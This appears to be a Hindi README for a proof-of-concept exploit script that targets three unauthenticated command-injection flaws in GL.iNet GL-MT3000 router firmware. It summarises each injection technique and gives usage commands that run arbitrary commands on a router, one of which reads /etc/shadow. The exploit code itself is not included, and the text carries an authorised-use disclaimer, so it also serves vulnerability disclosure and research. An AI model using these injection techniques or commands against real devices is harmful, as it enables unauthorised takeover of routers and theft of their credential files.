
GL.iNet GL-MT3000 (Beryl AX) ट्रैवल राउटर फर्मवेयर <= 4.4.5 में तीन बिना प्रमाणीकरण वाली कमांड इंजेक्शन भेद्यताओं (CVE-2026-11450, CVE-2026-11451, CVE-2026-11452) के लिए PoC।
| CVE | CVSS | तकनीक |
|---|---|---|
| CVE-2026-11450 | 7.3 | बफर आकार बेमेल (0x40 बनाम 0x100) access() गेट को बायपास करता है, $() को system() के माध्यम से इंजेक्ट किया जाता है |
| CVE-2026-11451 | 7.3 | FTP media_dir पैरामीटर में सिंगल-कोट एस्केप शेल कोटिंग को तोड़ देता है |
| CVE-2026-11452 | 7.3 | डबल-कोटेड printf के अंदर सांबा पासवर्ड पैरामीटर में $() कमांड प्रतिस्थापन |
तीनों बिना प्रमाणीकरण वाले /cgi-bin/glc CGI डिस्पैचर का शोषण करते हैं, जो बिना किसी प्रमाणीकरण या विधि अनुमतिसूची के dlopen/dlsym के माध्यम से प्लगइन्स लोड करता है।
# तीनों CVEs का शोषण करें
python3 poc.py http://192.168.8.1
# किसी विशिष्ट CVE का शोषण करें
python3 poc.py http://192.168.8.1 -c "id" -v 11450
python3 poc.py https://192.168.8.1 -c "id" -v 11451
python3 poc.py https://192.168.8.1 -c "id" -v 11452
# कस्टम कमांड और आउटपुट फ़ाइल
python3 poc.py http://192.168.8.1 -c "cat /etc/shadow" -o /tmp/pwned
केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए। उन प्रणालियों के विरुद्ध उपयोग न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है।